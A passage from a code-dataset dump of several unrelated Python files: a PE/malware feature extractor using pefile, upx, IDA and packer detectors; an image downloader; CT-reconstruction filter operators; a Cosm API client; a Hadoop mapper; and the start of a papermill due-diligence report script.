Column(Boolean)\n \"\"\"\n\n # if database.record_exists(session, database.PE, file_):\n # logging.debug(\"e_pe: record exists\")\n # return\n \n try:\n pe = pefile.PE(path)\n except pefile.PEFormatError as e:\n logging.debug(\"e_pe: {}\".format(e))\n return\n\n data_dir = pe.OPTIONAL_HEADER.DATA_DIRECTORY\n is_dotnet = False\n \n if len(data_dir) >= COM_DESC+1:\n \n com_desc = data_dir[14]\n if com_desc.name == \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\":\n # logging.error(\"e_pe: No COM descriptor\")\n if com_desc.VirtualAddress != 0 or com_desc.Size != 0:\n logging.debug(\"e_pe: .NET\")\n is_dotnet = True\n \n entry = database.PE(file=file_, machine_type=pe.FILE_HEADER.Machine, dotnet=is_dotnet)\n # session.add(entry)\n # session.commit()\n return entry\n\n\ndef e_upx(path, file_):\n # if database.record_exists(session, database.UPX, file_):\n # logging.debug(\"e_upx: record exists\")\n # return\n\n \n magic_str = session.query(database.Magic.magic_str).filter_by(file_id=file_.id).first()[0]\n\n logging.debug(\"e_ida_cfg: {}\".format(magic_str))\n\n entry = None\n \n if magic_str.find(\"UPX\") != -1:\n logging.debug(\"e_upx: UPX found\")\n decompressed = path + EXT_UNUPXED\n if not os.path.exists(decompressed):\n logging.debug(\"e_upx: decompressing to {}\".format(decompressed))\n cmd = \" \".join([\"upx\", \"-d\", \"-o{}\".format(decompressed), path])\n res = utils.check_output(cmd)\n success = False\n if not re.search(\"Unpacked 1 file\", res, re.I) or not os.path.exists(decompressed):\n msg = \"e_upx: Error unpacking {}\".format(path)\n log(msg + \"\\n\")\n log(res + \"\\n\")\n \n else:\n success = True\n\n \n entry = database.UPX(file=file_, result=success)\n # session.add(entry)\n # session.commit()\n else:\n logging.debug(\"e_upx: already decompressed\")\n\n # exit()\n return entry\n \nIDA_PATH = \"/home/vadim/ida-7.1/ida64\"\n# IDA_OUTPUT = \"/mnt/tmpfs/ida_output\"\n# IDA_IDB = \"/mnt/tmpfs/tmp.i64\"\nIDA_CFG_SCRIPT = \"utils/extract-cfg.py\"\nTMP_DIR = \"/mnt/tmpfs\"\n\ndef e_ida_cfg(path, file_):\n\n \"\"\"\n if database.record_exists(session, database.IDA_CFG, file_):\n logging.debug(\"e_ida_cfg: record exists\")\n return\n\n\n upx_rec = session.query(database.UPX).filter_by(file_id=file_.id).first()\n if upx_rec:\n logging.debug(\"e_ida_cfg: UPXed binary\")\n decompressed = path + EXT_UNUPXED\n if upx_rec.result and os.path.exists(decompressed):\n logging.debug(\"e_ida_cfg: using decompressed binary: {}\".format(decompressed))\n path = decompressed\n \"\"\"\n\n filename = os.path.basename(path)\n idb_path = os.path.join(TMP_DIR, filename + \".i64\")\n ida_out_path = os.path.join(TMP_DIR, filename + \".out\")\n\n\n logging.debug(\"e_ida_cfg: IDB path = {}\".format(idb_path))\n logging.debug(\"e_ida_cfg: IDA Out path = {}\".format(ida_out_path))\n\n script_path = os.path.abspath(IDA_CFG_SCRIPT)\n logging.debug(\"e_ida_cfg: IDA CFG ({})\".format(script_path))\n subprocess.call([\n IDA_PATH,\n \"-A\", \"-c\",\n \"-o{}\".format(idb_path),\n \"-S{}\".format(script_path),\n path])\n\n entry = None\n \n if not os.path.exists(ida_out_path):\n msg = \"e_ida_cfg: error processing: {}\".format(path)\n logging.error(msg)\n log(msg)\n else:\n data = utils.read_file(ida_out_path)\n # print zlib.decompress(data)\n entry = database.IDA_CFG(file=file_, data=data)\n # session.add(entry)\n # session.commit()\n\n \n # Clean up for the next one\n utils.remove(idb_path)\n utils.remove(ida_out_path)\n # exit()\n return entry\n\n\ndef e_pe_features_1(path, file_):\n pe = pefile.PE(path)\n sections = []\n for section in pe.sections:\n sections.append({\n \"name\": utils.b64enc(utils.strip_nulls(section.Name)),\n \"size\": section.SizeOfRawData,\n \"characteristics\": section.Characteristics\n })\n\n imports = []\n if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):\n\n for entry in pe.DIRECTORY_ENTRY_IMPORT:\n imports.append({\n \"dll\": entry.dll,\n \"names\": [imp.name if imp.name else imp.ordinal for imp in entry.imports]\n })\n\n exports = []\n if hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):\n for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n #print hex(pe.OPTIONAL_HEADER.ImageBase + exp.address), exp.name, exp.ordinal\n exports.append(exp.name)\n\n\n cb_cnt = 0\n if hasattr(pe, 'DIRECTORY_ENTRY_TLS'):\n cb_rva = pe.DIRECTORY_ENTRY_TLS.struct.AddressOfCallBacks - pe.OPTIONAL_HEADER.ImageBase\n while True:\n try:\n cb_addr = pe.get_dword_from_data(pe.get_data(cb_rva + 4 * cb_cnt, 4), 0)\n except pefile.PEFormatError as e:\n logging.error(str(e))\n break\n if cb_addr == 0:\n break\n cb_cnt += 1\n\n\n named_resources = []\n \n if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):\n\n for rsrc in pe.DIRECTORY_ENTRY_RESOURCE.entries:\n\n for r in rsrc.directory.entries:\n if r.name:\n named_resources.append(r.name.__str__())\n\n # logging.debug(\"rsrc: {} - {}\".format(n_rsrc, resources))\n \n data = {\n \"file_header.characteristics\": pe.FILE_HEADER.Characteristics,\n \"optional_header.subsystem\": pe.OPTIONAL_HEADER.Subsystem,\n \n \"sections\": sections,\n\n \"imports\": imports,\n \"exports\": exports,\n \"n_tls_callbacks\": cb_cnt,\n \"named_resources\": named_resources\n }\n\n # print simplejson.dumps(data, indent=2)\n data = zlib.compress(simplejson.dumps(data))\n\n return database.PE_Features_1(file=file_, data=data)\n\n\ndef e_ssdeep(path, file_):\n pe = pefile.PE(path)\n # print type(pe.__data__[::])\n whole_file = ssdeep.hash(pe.__data__[::])\n # print whole_file\n base = pe.OPTIONAL_HEADER.ImageBase\n ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint\n # print hex(ep)\n\n ep_section = None\n \n for section in pe.sections:\n size = section.Misc_VirtualSize\n if size == 0:\n size = section.SizeOfRawData\n \n if ep >= section.VirtualAddress and ep < section.VirtualAddress + size:\n # print section.Name\n # sect_data = pe.__data__[section.PointerToRawData:section.SizeOfRawData]\n # print sect_data[:10].encode(\"hex\")\n ep_section = ssdeep.hash( pe.get_data(section.VirtualAddress))\n break\n\n if not ep_section:\n logging.error(\"Couldn't fine EP section in {}\".format(path))\n else:\n return database.SSDEEP(file=file_, whole_file=whole_file, ep_section=ep_section)\n\n\ndef e_virustotal(path, file_):\n pass\n\nPACKER_DETECTORS = [\n PEIDDetector.PEIDDetector(PACKER_DETECT_CONFIG),\n BadEntryPointSectionDetector.BadEntryPointSectionDetector(PACKER_DETECT_CONFIG),\n LowImportCountDetector.LowImportCountDetector(PACKER_DETECT_CONFIG),\n PackerSectionNameDetector.PackerSectionNameDetector(PACKER_DETECT_CONFIG),\n NonStandardSectionNameDetector.NonStandardSectionNameDetector(PACKER_DETECT_CONFIG)\n]\n\ndef e_pypackerdetect(path, file_):\n report = PackerReport.PackerReport(path)\n pe = pefile.PE(path)\n \n for detector in PACKER_DETECTORS:\n detector.Run(pe, report)\n \n data = report.GetJson()\n\n if data[\"failed\"]:\n logging.error(\"Couldn't run PyPackerDetct on {}\".format(path))\n return\n\n if data[\"detections\"] == 0 and data[\"suspicions\"] == 0:\n return\n\n logging.debug(\"{}: \".format(os.path.basename(path)))\n for msg in data[\"logs\"]:\n logging.debug(\" {}\".format(msg))\n \n return database.PyPackerDetect(file=file_, data=utils.pack(data))\n\n \n\n# DON't FORGET TO ADD AN ENTRY TO THE TABLES DICT BELOW!\nALL = {\n \"magic\": e_magic,\n \"pe\": e_pe,\n \"upx\": e_upx,\n \"ida_cfg\": e_ida_cfg,\n \"pe_features_1\": e_pe_features_1,\n \"ssdeep\": e_ssdeep,\n \"virustotal\": e_virustotal,\n \"pypackerdetect\": e_pypackerdetect\n}\n\n\nTABLES = {\n \"magic\": database.Magic,\n \"pe\": database.PE,\n \"upx\": database.UPX,\n \"ida_cfg\": database.IDA_CFG,\n \"pe_features_1\": database.PE_Features_1,\n \"ssdeep\": database.SSDEEP,\n \"virustotal\": database.VirusTotal,\n \"pypackerdetect\": database.PyPackerDetect\n}\n","sub_path":"core/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"144674920","text":"from urllib.request import urlretrieve\r\nfrom urllib.error import HTTPError\r\nimport sys\r\n# import os\r\n\r\n\r\ndef download_images(urlstxt, pattern):\r\n with open(urlstxt, 'r', encoding='utf8') as file:\r\n t = f = 0\r\n log = []\r\n\r\n def _progress(count, block_size, total_size):\r\n sys.stdout.write('\\r>> Downloading %s %.1f%%' % (filename,\r\n float(count * block_size) / float(total_size) * 100.0))\r\n sys.stdout.flush()\r\n for i, url in enumerate(file):\r\n if url[-1] in ('\\n', '\\r'):\r\n url = url[:-1]\r\n filename = '{}_{}.jpg'.format(pattern, i)\r\n try:\r\n filepath, _ = urlretrieve(url=url, filename=filename, reporthook=_progress)\r\n print()\r\n t += 1\r\n except HTTPError as e:\r\n print(e)\r\n log.append('HTTPError: {} at file:{} with url:{}\\n'.format(e, filename, url))\r\n f += 1\r\n except Exception as ex:\r\n print(ex)\r\n log.append('Error: {} at file:{} with url:{}\\n'.format(ex, filename, url))\r\n f += 1\r\n print('Successfully downloaded {}'.format(t))\r\n print('Download errors {}'.format(f))\r\n with open('log.txt', 'w', encoding='utf8') as l:\r\n l.writelines(log)\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) > 1:\r\n download_images(sys.argv[1], sys.argv[2])\r\n","sub_path":"download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384500175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 12 10:03:26 2018\n\n@author: lagerwer\n\"\"\"\n\n\nimport odl\nimport numpy as np\nimport pylab\nimport pyfftw\nimport time\nimport os\nimport shutil\nfrom tempfile import mkstemp\nfrom scipy.ndimage import gaussian_filter\n# %% Working vars function\nclass working_var_map:\n def __init__(self):\n base_WV_path = 'python_data/working_vars'\n _, temp_name = mkstemp()\n self.WV_path = base_WV_path + temp_name + '/'\n os.makedirs(self.WV_path)\n\n\n def __del__(self):\n shutil.rmtree(self.WV_path, ignore_errors=True)\n# %%\nclass SymOp(odl.Operator):\n def __init__(self, dom, ran):\n odl.Operator.__init__(self, domain=dom, range=ran, linear=True)\n self.dom = dom\n self.ran = ran\n\n def _call(self, x):\n u = np.asarray(x)\n return np.concatenate([u[-1:], u[::-1], u[1:]])\n\n @property\n def adjoint(self):\n functional = self\n\n class AdjSymOp(odl.Operator):\n def __init__(self):\n super().__init__(domain=functional.range,\n range=functional.domain, linear=True)\n\n def _call(self, x):\n u = np.asarray(x)\n mid = int(np.floor(np.size(u) / 2))\n x_out = u[mid:] + u[mid-1::-1]\n return x_out\n\n @property\n def adjoint(self):\n return functional\n return AdjSymOp()\n\n\n# %%\nisft = np.fft.ifftshift\nclass ConvolutionOp(odl.Operator):\n def __init__(self, filter_space, data_space, det_space, g_w, a_wc):\n odl.Operator.__init__(self, domain=filter_space, range=data_space, linear=True)\n\n self.rs_detu = int(2**(np.ceil(np.log2(np.size(filter_space)))+1))\n self.frs_detu = int(self.rs_detu/2 + 1)\n self.rs_filt = odl.ResizingOperator(filter_space,\n ran_shp=(self.rs_detu,))\n self.gw = np.asarray(g_w)\n self.a_wc = a_wc\n self.w_detu = self.rs_filt.domain.weighting.const\n self.det_tr_space = odl.uniform_discr([det_space.min_pt[1], det_space.min_pt[0]],\n [det_space.max_pt[1], det_space.max_pt[0]],\n (np.size(det_space, 1), np.size(det_space, 0)))\n self.rs_det = odl.ResizingOperator(self.det_tr_space,\n ran_shp=(np.size(self.range, 2),\n self.rs_detu))\n self.flt = 'float32'\n self.clx = 'complex64'\n self.flt1 = 'float64'\n self.clx1 = 'complex128'\n thrds = 8\n self.d_a = pyfftw.empty_aligned((np.size(self.range, 2), self.rs_detu),\n dtype=self.flt)\n self.d_b = pyfftw.empty_aligned((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n self.fft_d = pyfftw.FFTW(self.d_a, self.d_b, axes=(1,), threads=thrds)\n self.id_a = pyfftw.empty_aligned((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n self.id_b = pyfftw.empty_aligned((np.size(self.range, 2), self.rs_detu),\n dtype=self.flt)\n self.ifft_d = pyfftw.FFTW(self.id_a, self.id_b, axes=(1,), threads=thrds, direction='FFTW_BACKWARD')\n\n\n self.f_a = pyfftw.empty_aligned(self.rs_detu, dtype=self.flt)\n self.f_b = pyfftw.empty_aligned(self.frs_detu, dtype=self.clx)\n self.fft_f = pyfftw.FFTW(self.f_a, self.f_b)\n self.if_a = pyfftw.empty_aligned(self.frs_detu, dtype=self.clx1)\n self.if_b = pyfftw.empty_aligned(self.rs_detu, dtype=self.flt1)\n self.ifft_f = pyfftw.FFTW(self.if_a, self.if_b, direction='FFTW_BACKWARD')\n\n def _call(self, x, out):\n # Do the convolution\n # overwrite f_b, fourier transform filter\n y = np.asarray(out)\n self.fft_f(isft(self.rs_filt(x)))\n # Create a detector sized stack of fourier tranformed filters\n hf_stack = np.zeros((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n # Resize the weighted data\n tmp1 = self.rs_det.range.element()\n # Stack the filter\n for j in range(np.size(self.range, 2)):\n hf_stack[j, :] = self.f_b\n for i in range(np.size(self.range, 0)):\n # Fourier transform of the data with angle i\n self.rs_det(self.gw[i,:,:].T, out=tmp1)\n self.fft_d(tmp1) # overwrite d_b\n # Product of the filter and the data in fspace\n self.d_b *= hf_stack\n # overwrite id_b, inverse fourier transform product\n self.ifft_d(self.d_b)\n # Overwrite the data with the convolution\n y[i, :, :] = np.asarray(self.rs_det.inverse(self.id_b)).T\n out[:] = y\n\n @property\n def adjoint(self):\n f = self\n\n class AdjStackingOp(odl.Operator):\n def __init__(self):\n super().__init__(domain=f.range, range=f.domain, linear=True)\n\n def _call(self, x, out):\n # Create a vector for the convolution resul\n tmp3 = np.zeros(f.rs_detu, dtype=f.flt1)\n # Resize the input\n x = np.asarray(x)\n tmp = f.rs_det.range.element()\n tmp2 = f.rs_det.range.element()\n for i in range(np.size(f.range, 0)):\n # fourier transform the data for angle i\n (f.rs_det(f.gw[i, :, :].T, out = tmp))\n f.fft_d(tmp) # overwrite d_b\n tmp1 = np.conj(f.d_b)\n # fourier transform the input for angle i\n (f.rs_det(x[i, :, :].T, out=tmp2))\n f.fft_d(tmp2) # overwrite d_b\n # compute product\n tmp1 *= f.d_b\n # inverse fourier transform product\n tmp4 = np.sum(tmp1, 0)\n f.ifft_f(tmp4) # Overwrite if_b\n tmp3 += f.if_b\n tmp1, tmp2, tmp4 = None, None, None\n tmp3 *= f.w_detu * f.a_wc\n tmp4 = isft(tmp3)\n f.rs_filt.inverse(tmp4, out=out)\n\n\n @property\n def adjoint(self):\n return f\n return AdjStackingOp()\n\n def conv_hf(self, hf):\n y = np.zeros(np.shape(self.range))\n hf_stack = np.zeros((np.size(self.range, 2), self.frs_detu),\n dtype=self.clx)\n # Resize the weighted data\n tmp1 = self.rs_det.range.element()\n # Stack the filter\n for j in range(np.size(self.range, 2)):\n hf_stack[j, :] = hf\n for i in range(np.size(self.range, 0)):\n # Fourier transform of the data with angle i\n self.rs_det(self.gw[i,:,:].T, out=tmp1)\n self.fft_d(tmp1) # overwrite d_b\n # Product of the filter and the data in fspace\n self.d_b *= hf_stack\n # overwrite id_b, inverse fourier transform product\n self.ifft_d(self.d_b)\n # Overwrite the data with the convolution\n y[i, :, :] = np.asarray(self.rs_det.inverse(self.id_b)).T\n return self.range.element(y) # Invert the resizing\n\n\n# %% Exponential binning funciton\ndef ExpBin(bin_param, size_filter_space):\n i = 0\n d = []\n B = [0]\n width = 1\n while i < int(size_filter_space/2):\n if i < bin_param:\n d += [width]\n i += 1\n B += [np.sum(d)]\n else:\n d += [width]\n width *= 2\n i += width\n B += [np.sum(d)]\n B += [int(size_filter_space/2)]\n return np.asarray(B)\n\n\n# %%\ndef ExpOp_builder(bin_param, filter_space, interp):\n # Create binning scheme\n if interp == 'Full':\n spf_space = filter_space\n Exp_op = odl.IdentityOperator(filter_space)\n elif interp == 'uniform':\n # Create binning scheme\n dpix = np.size(filter_space)\n dsize = filter_space.max_pt\n filt_bin_space = odl.uniform_discr(-dsize, dsize, dpix // (bin_param))\n spf_space = odl.uniform_discr(0, dsize, dpix //(2 * bin_param))\n resamp = odl.Resampling(filt_bin_space, filter_space)\n sym = SymOp(spf_space, filt_bin_space)\n Exp_op = resamp * sym\n else:\n if interp == 'constant':\n interp = 'nearest'\n elif interp == 'linear':\n pass\n else:\n raise ValueError('unknown `expansion operator type` ({})'\n ''.format(interp))\n B = ExpBin(bin_param, np.size(filter_space)) * filter_space.weighting.const\n B[-1] -= 1/2*filter_space.weighting.const\n\n # Create sparse filter space\n spf_part = odl.nonuniform_partition(B, min_pt=0, max_pt=B[-1])\n spf_weight = np.ravel(np.multiply.reduce(np.meshgrid(*spf_part.cell_sizes_vecs)))\n spf_fspace = odl.FunctionSpace(spf_part.set)\n spf_space = odl.DiscreteLp(spf_fspace, spf_part, odl.rn(spf_part.size,\n weighting=spf_weight), interp=interp)\n filt_pos_part = odl.uniform_partition(0, B[-1], int(np.size(filter_space)/2))\n\n filt_pos_space = odl.uniform_discr_frompartition(filt_pos_part, dtype='float64')\n lin_interp = odl.Resampling(spf_space, filt_pos_space)\n\n # Create symmetry operator\n sym = SymOp(filt_pos_space, filter_space)\n\n # Create sparse filter operator\n Exp_op = sym * lin_interp\n return spf_space, Exp_op\n\n\n# %% Function to compute the FDK weighting\ndef FDK_weighting(detecpix, det_space, w_detu, w_detv, src_rad, det_rad=0):\n midu = int(detecpix[0]/2)\n midv = int(detecpix[1]/2)\n rho = src_rad + det_rad\n w_FDK = np.ones((np.shape(det_space))) * rho ** 2\n for i in range(np.size(w_FDK, 0)):\n w_FDK[i, :] += ((-midu + i + 1/2) * w_detu) ** 2\n\n for j in range(np.size(w_FDK, 1)):\n w_FDK[:, j] += ((-midv + j + 1/2) * w_detv) ** 2\n\n return rho * np.sqrt(1 / w_FDK)\n\n\n# %% Ramp filter\ndef ramp_filt(rs_detu):\n mid_det = int(rs_detu / 2)\n filt_impr = np.zeros(mid_det + 1)\n n = np.arange(mid_det + 1)\n tau = 1\n filt_impr[0] = 1 / (4* tau **2)\n filt_impr[1::2] = -1 / (np.pi ** 2 * n[1::2] ** 2* tau **2)\n filt_impr = np.append(filt_impr[:-1], np.flip(filt_impr[1:], 0))\n return filt_impr\n\n\n# %%\ndef make_bin_LP(level):\n LP_base = np.array([1/2, 1/2])\n LP = LP_base.copy()\n if level == 1:\n return LP\n else:\n for i in range(level-1):\n LP = np.convolve(LP, LP_base)\n return LP\n \n# %%\ndef low_pass_filter(h, LP_filt):\n h_LP = np.zeros(np.shape(h))\n if LP_filt[0] == 'Gauss':\n gaussian_filter(h, LP_filt[1], output=h_LP)\n elif LP_filt[0] == 'Bin':\n LP = make_bin_LP(LP_filt[1])\n h_LP = np.convolve(h, LP, mode='same')\n return h_LP\n","sub_path":"AFFDK/sup_func_AFFDK.py","file_name":"sup_func_AFFDK.py","file_ext":"py","file_size_in_byte":10984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"450044633","text":"# -*- coding: utf-8 -*-\n\nimport json\n\nfrom collections import Sequence\nfrom datetime import datetime\n\ntry:\n from urlparse import urljoin\nexcept ImportError:\n from urllib.parse import urljoin # NOQA\n\nimport cosm\n\n\nDEFAULT_FORMAT = 'json'\n\n\nclass Client(object):\n\n api_version = 'v2'\n client_class = cosm.Client\n\n def __init__(self, key):\n self.client = self.client_class(key)\n self.client.base_url += '/{}/'.format(self.api_version)\n self.feeds = FeedsManager(self.client)\n self.triggers = TriggersManager(self.client)\n\n\nclass ManagerBase(object):\n\n def _url(self, url_or_id):\n url = self.base_url\n if url_or_id:\n url += '/'\n url = urljoin(url, str(url_or_id))\n return url\n\n def _json_default(self, obj):\n if not isinstance(obj, datetime):\n raise TypeError\n return obj.isoformat() + 'Z'\n\n def _parse_datetime(self, value):\n return datetime.strptime(value, \"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n def _prepare_params(self, params):\n params = dict(params)\n for name, value in params.items():\n if isinstance(value, datetime):\n params[name] = value.isoformat() + 'Z'\n return params\n\n\nclass FeedsManager(ManagerBase):\n\n def __init__(self, client):\n self.client = client\n self.base_url = urljoin(client.base_url, 'feeds')\n\n def create(self, title, **kwargs):\n data = dict(title=title, **kwargs)\n response = self.client.post(self.base_url, data=data)\n response.raise_for_status()\n feed = cosm.Feed(**data)\n feed._manager = self\n feed._data['feed'] = response.headers['location']\n return feed\n\n def update(self, id_or_url, **kwargs):\n url = self._url(id_or_url)\n response = self.client.put(url, data=kwargs)\n response.raise_for_status()\n\n def list(self, **params):\n url = self._url(None)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n json = response.json()\n for feed_data in json['results']:\n feed = cosm.Feed(**feed_data)\n feed._manager = self\n yield feed\n\n def get(self, url_or_id, **params):\n url = self._url(url_or_id)\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n datastreams_data = data.pop('datastreams', None)\n feed = cosm.Feed(**data)\n feed._manager = self\n if datastreams_data:\n datastreams = self._coerce_datastreams(\n feed.datastreams, datastreams_data)\n feed._data['datastreams'] = datastreams\n return feed\n\n def delete(self, url_or_id):\n url = self._url(url_or_id)\n response = self.client.delete(url)\n response.raise_for_status()\n\n def _coerce_datastreams(self, datastreams_manager, datastreams_data):\n coerce = datastreams_manager._coerce_to_datastream\n datastreams = []\n for data in datastreams_data:\n datastream = coerce(data)\n datastreams.append(datastream)\n return datastreams\n\n\nclass DatastreamsManager(Sequence, ManagerBase):\n\n def __init__(self, feed):\n self.feed = feed\n feed_manager = getattr(feed, '_manager', None)\n if feed_manager is not None:\n self.client = feed_manager.client\n self.base_url = feed.feed.replace('.json', '') + '/datastreams'\n else:\n self.client = None\n\n def __contains__(self, value):\n return value in self.datastreams['datastreams']\n\n def __getitem__(self, item):\n return self._datastreams[item]\n\n def __len__(self):\n return len(self._datastreams)\n\n @property\n def _datastreams(self):\n return self.feed._data['datastreams']\n\n def create(self, id, **kwargs):\n data = {'version': \"1.0.0\", 'datastreams': [dict(id=id, **kwargs)]}\n response = self.client.post(self.base_url, data=data)\n response.raise_for_status()\n datastream = cosm.Datastream(id=id, **kwargs)\n datastream._manager = self\n return datastream\n\n def update(self, datastream_id, **kwargs):\n url = self._url(datastream_id)\n response = self.client.put(url, data=kwargs)\n response.raise_for_status()\n\n def list(self, **params):\n url = self._url('..')\n response = self.client.get(url, params=params)\n response.raise_for_status()\n json = response.json()\n for datastream_data in json.get('datastreams', []):\n datastream = cosm.Datastream(**datastream_data)\n datastream._manager = self\n yield datastream\n\n def get(self, id, **params):\n url = self._url(id)\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n datastream = self._coerce_to_datastream(data)\n return datastream\n\n def delete(self, url_or_id):\n url = self._url(url_or_id)\n response = self.client.delete(url)\n response.raise_for_status()\n\n def _coerce_datapoints(self, datapoints_manager, datapoints_data):\n coerce = datapoints_manager._coerce_to_datapoint\n datapoints = []\n for data in datapoints_data:\n data['at'] = self._parse_datetime(data['at'])\n datapoint = coerce(data)\n datapoints.append(datapoint)\n return datapoints\n\n def _coerce_to_datastream(self, d):\n if isinstance(d, dict):\n datapoints_data = d.pop('datapoints', None)\n datastream = cosm.Datastream(**d)\n if datapoints_data:\n datapoints = self._coerce_datapoints(\n datastream.datapoints, datapoints_data)\n datastream.datapoints = datapoints\n datastream._manager = self\n return datastream\n\n\nclass DatapointsManager(Sequence, ManagerBase):\n\n def __init__(self, datastream):\n self.datastream = datastream\n datastream_manager = getattr(datastream, '_manager', None)\n if datastream_manager is not None:\n self.client = datastream._manager.client\n datastream_url = datastream._manager._url(datastream.id)\n self.base_url = datastream_url + '/datapoints'\n else:\n self.client = None\n\n def __contains__(self, value):\n return value in self.datapoints['datapoints']\n\n def __getitem__(self, item):\n return self._datapoints[item]\n\n def __len__(self):\n return len(self._datapoints)\n\n @property\n def _datapoints(self):\n return self.datastream._data['datapoints']\n\n def create(self, datapoints):\n datapoints = [self._coerce_to_datapoint(d) for d in datapoints]\n payload = {'datapoints': datapoints}\n response = self.client.post(self.base_url, data=payload)\n response.raise_for_status()\n return datapoints\n\n def update(self, at, value):\n url = \"{}/{}Z\".format(self.base_url, at.isoformat())\n payload = {'value': value}\n response = self.client.put(url, data=payload)\n response.raise_for_status()\n\n def get(self, at):\n url = \"{}/{}Z\".format(self.base_url, at.isoformat())\n response = self.client.get(url)\n response.raise_for_status()\n data = response.json()\n data['at'] = self._parse_datetime(data['at'])\n return self._coerce_to_datapoint(data)\n\n def history(self, **params):\n url = self._url('..').rstrip('/')\n params = self._prepare_params(params)\n response = self.client.get(url, params=params)\n response.raise_for_status()\n data = response.json()\n for datapoint_data in data['datapoints']:\n datapoint_data['at'] = self._parse_datetime(datapoint_data['at'])\n yield self._coerce_to_datapoint(datapoint_data)\n\n def delete(self, at=None, **params):\n url = self.base_url\n if at:\n url = \"{}/{}Z\".format(url, at.isoformat())\n elif params:\n params = self._prepare_params(params)\n response = self.client.delete(url, params=params)\n response.raise_for_status()\n\n def _coerce_to_datapoint(self, d):\n if isinstance(d, cosm.Datapoint):\n datapoint = self._clone_datapoint(d)\n elif isinstance(d, dict):\n datapoint = cosm.Datapoint(**d)\n datapoint._manager = self\n return datapoint\n\n def _clone_datapoint(self, d):\n return cosm.Datapoint(**d._data)\n\n\nclass TriggersManager(ManagerBase):\n\n def __init__(self, client):\n self.client = client\n self.base_url = urljoin(client.base_url, \"triggers\")\n\n def create(self, *args, **kwargs):\n trigger = cosm.Trigger(*args, **kwargs)\n response = self.client.post(self.base_url, data=trigger)\n response.raise_for_status()\n trigger._manager = self\n location = response.headers['location']\n trigger._data['id'] = int(location.rsplit('/', 1)[1])\n return trigger\n\n def get(self, id):\n url = self._url(id)\n response = self.client.get(url)\n response.raise_for_status()\n data = response.json()\n data.pop('id')\n notified_at = data.pop('notified_at', None)\n user = data.pop('user', None)\n trigger = cosm.Trigger(**data)\n trigger._data['id'] = id\n if notified_at:\n trigger._data['notified_at'] = self._parse_datetime(notified_at)\n if user:\n trigger._data['user'] = user\n trigger._manager = self\n return trigger\n","sub_path":"cosm/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"6720169","text":"import sys\n#\n# >>> Escriba el codigo del mapper a partir de este punto <<<\n#\n\nif __name__ == \"__main__\":\n \n for line in sys.stdin:\n # Setting some defaults\n letra = \"\"\n fecha = \"\"\n valor = \"\"\n \n line = line.strip()\n splits = line.split(\" \")\n letra = splits[0]\n fecha = splits[1]\n valor = splits[2]\n \n print(letra + '\\t' + fecha + ',' + valor)","sub_path":"01-hadoop-50/q09-10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"510981363","text":"\"\"\"Papermill Due Diligence View Module\"\"\"\n__docformat__ = \"numpy\"\n\nimport argparse\nfrom typing import List\nfrom datetime import datetime\nimport os\nimport webbrowser\nimport papermill as pm\nfrom gamestonk_terminal.helper_funcs import parse_known_args_and_warn\nfrom gamestonk_terminal import config_terminal as cfg\n\n\ndef due_diligence_report(other_args: List[str]):\n \"\"\"Due Diligence Report\n\n Parameters\n ----------\n other_args : List[str]\n Command line arguments to be processed with argparse\n \"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"dd\",\n description=\"\"\"\n Run due diligence analysis\n \"\"\",\n )\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n required=\"-h\" not in other_args,\n help=\"Stock ticker\",\n )\n parser.add_argument(\n \"-m\",\n \"--mode\",\n action=\"store\",\n dest=\"mode\",\n default=\"html\",\n choices=[\"ipynb\", \"html\"],\n help=\"Output mode to show report. ipynb will allow to add information to the report.\",\n )\n\n try:\n if other_args:\n if \"-t\" not in other_args and \"-h\" not in other_args:\n other_args.insert(0, \"-t\")\n\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n # Update values:\n s_ticker = ns_parser.s_ticker\n today = datetime.now()\n analysis_notebook = os.path.join(\n \"notebooks\",\n \"reports\",\n f\"{s_ticker}_due_diligence_{today.strftime('%Y%m%d_%H%M%S')}\",\n )\n pm.execute_notebook(\n os.path.join(\"notebooks\", \"templates\", \"due_diligence.ipynb\"),\n analysis_notebook + \".ipynb\",\n parameters=dict(\n ticker=s_ticker,\n report_name=f\"{s_ticker}_due_diligence_{today.strftime('%Y%m%d_%H%M%S')}\",\n base_path=os.path.abspath(os.path.join(\".\")),\n ),\n )\n\n if ns_parser.mode == \"ipynb\":\n webbrowser.open(\n os.path.join(\n f\"http://localhost:{cfg.PAPERMILL_NOTEBOOK_REPORT_PORT}\",\n \"notebooks\",\n analysis_notebook + \".ipynb\",\n )\n )\n else:\n webbrowser.open(\n os.path.join(\n 